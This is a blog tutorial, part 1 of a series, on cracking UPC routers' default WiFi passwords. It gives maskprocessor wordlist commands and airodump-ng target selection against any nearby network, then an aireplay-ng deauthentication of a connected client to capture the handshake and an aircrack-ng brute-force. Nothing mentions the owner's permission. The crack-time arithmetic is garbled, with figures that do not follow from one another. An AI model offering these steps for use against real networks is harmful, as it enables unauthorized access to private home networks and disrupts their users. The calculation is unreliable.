• Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Facebook Twitter Instagram
Trending
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
  • Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
  • Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Facebook Twitter YouTube Tumblr Instagram Pinterest
Hacking Tutorials
  • Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Hacking Tutorials
You are at:Home » Wifi Hacking Tutorials » How to hack UPC wireless networks and other WLAN pt 1
How to hack UPC wireless networks and other WLAN
How to hack UPC wireless networks and other WLAN

How to hack UPC wireless networks and other WLAN pt 1

0
By Hacking Tutorials on May 24, 2015 Wifi Hacking Tutorials

In this tutorials we will show you how to hack UPC wireless networks with the default password which is a common thing for many UPC customers. The first step is to create a password list which contains all possible combinations of 8 capital letters. We will be using Maskprocessor in Kali Linux to create the password list. Than we will be capturing a 4 way handshake with Airodump-ng by deauthentication of a connected client with Aireplay-ng. The last step is to brute force the password using Aicrack-ng. In part 2 of this tutorial we will be using oclHashcat with the power of GPU since CPU will take way too much time with this passwords list.

How to hack UPC wireless networks in 3 steps

Step 1: Creating the password list with Maskprocessor
Step 2: Capturing the 4-way handshake with Airodump-ng
Step 3: Brute forcing the password with Aircrack-ng

Creating the password list with Maskprocessor

We will use maskprocessor to generate the password lists piping each letter to a file so we could use multiple computers to speed up brute forcing the password.

maskprocessor A?u?u?u?u?u?u?u -o /usr/A.txt
maskprocessor B?u?u?u?u?u?u?u -o /usr/B.txt
maskprocessor C?u?u?u?u?u?u?u -o /usr/C.txt
etc…. Repeat for every letter in the alphabet.

The filesize for each document will be approximately 60 GB. You can use the following command to see how many different combinations each file will contain:

maskprocessor A?u?u?u?u?u?u?u –combinations

8.031.810.176 combinations…
* 26 letters
208.827.064.576 possible combinations

Step 2: Capturing the handshake with Airodump-ng

The next thing we have to do is capture the handshake with Airodump-ng. We will be using Airodump-ng first to select our target and retrieve it’s BSSID and channel the WiFi access point is broadcasting on. Then we will use Aireplay-ng to de-authenticate a connected client to force a reconnect, which will give us the fourway handshake we need. Now let’s start Airodump-ng to find our target by using the following command:
airodump-ng mon0

Now pick your target’s BSSID and channel and restart Airodump-ng with the following command and look for a connected client:

airodump-ng –bssid [BSSID] -c [channel]-w [filepath to store .cap]wlan0mon

Open a new terminal and issue an deauthentication command for the connected client using Aireplay-ng.

aireplay-ng -0 2 -a [BSSID] -c [Client MAC] mon0

Deauthentication successful and the 4 way handshake is captured!
Aircrack-ng aireplay-ng

Step 3: Brute forcing the password with Aircrack-ng

Let’s do some maths first:
1x AMD hd7970 1000mhz core clock with oclHashcat v1.35 can do 142.000 combinations per second.

26^8 = 208,827,064,576 combinations
26^8 / 142,000 keys per second = 1470613 seconds
2,610,338 / 60 seconds = 24510 minutes
43,505 / 60 minutes = 408,5 hours
725 hours / 24 hours = 17 Days

50% chance of cracking the password in 8.5 days.

It takes 17 days to brute force a standard UPC password and hack UPC wireless networks with a single average videocard using oclHashcat. In this video we will be bruteforcing the file with Aircrack-ng and a processor which takes 100 times longer than bruteforcing the password with a GPU and oclHashcat. Take a look at part 2 of this tutorial on how to use oclHashcat with the power of GPU.

Use the following command to bruteforce the password with Aircrack-ng:

aircrack-ng -a 2 -b [Router BSSID] -w [Filepath to password list] [Filepath to .cap file]

Eventually it will crack the password:

Hack UPC Wireless networks 1

Lesson learned

Nowadays fast GPU’s are available for decent prices and are often the standard in consumer laptops and desktops, especially when they are build for multimedia and gaming. With these powerful CPU’s and GPU’s the average home user has the power to crack passwords which are considered strong and safe by many end users. Even though 17 days is too long for most to crack a Wifi password it is accessible if you really want to. If you add 3 more letters, or even better, numbers or special characters like a ! or a $-sign it will be close to impossible to crack for an average home user.

Thanks for watching and it would be great if you subscribed to my YouTube channel too for more hacking tutorials :)

Wireless Hacking Banner

If you’re interested in learning more about WiFi hacking, penetration testing and wireless in general, you can follow any of these online courses:


Online Hacking Courses


Learn Wi-fi Hacking/Penetration Testing From Scratch

This course contains 50 Videos to learn practical attacks to test the security of Wi-fi and wired networks from scratch using Linux. Read more…

ARP spoofing & Man In The Middle Attacks Execution & Detection

Learn practical attacks to test the security of clients connected to a network and how to protect against these attacks. Read more…

Share on:

  • Email
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
Previous ArticleCrunch Password list generation in Kali Linux
Next Article Pixie Dust Attack WPS in Kali Linux with Reaver

Related Posts

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

Installing Rogue-jndi on Kali Linux

Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network

Leave A Reply Cancel Reply

Top Tutorials
By Hacking TutorialsOctober 29, 20220

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

By Hacking TutorialsJanuary 10, 20220

Installing Rogue-jndi on Kali Linux

By Hacking TutorialsDecember 17, 20210

Log4Shell VMware vCenter Server (CVE-2021-44228)

By Hacking TutorialsSeptember 27, 20210

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw

By Hacking TutorialsFebruary 4, 20200

CVE-2019-19781: Citrix ADC RCE vulnerability

By Hacking TutorialsNovember 1, 20188

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

Subscribe

Enter your email address to subscribe to Hacking Tutorials and receive notifications of new tutorials by email.

Join 828 other subscribers
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
Virtual Hacking Labs
Penetration Testin Course and Hacking Labs
Categories
  • Digital Forensics
  • Exploit tutorials
  • General Tutorials
  • Hacking Books
  • Hacking Courses
  • Malware Analysis Tutorials
  • Metasploit Tutorials
  • Networking
  • Pentesting Exchange
  • Scanning Tutorials
  • Web Applications
  • Wifi Hacking Tutorials
Downloads
  • directory_scanner.py (120596 downloads)
  • PEiD-0.95-20081103.zip (111450 downloads)
  • wifi_jammer.py (138194 downloads)
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
Popular Tutorials
By Hacking TutorialsSeptember 1, 2016115

Review: Offensive Security Certified Professional (OSCP)

By Hacking TutorialsApril 18, 201738

Exploiting Eternalblue for shell with Empire & Msfconsole

By Hacking TutorialsMarch 17, 201637

Installing VPN on Kali Linux 2016 Rolling

Featured Downloads
  • directory_scanner.py (120596 downloads)
  • PEiD-0.95-20081103.zip (111450 downloads)
  • wifi_jammer.py (138194 downloads)
© Hacking Tutorials 2022

Type above and press Enter to search. Press Esc to cancel.

Go to mobile version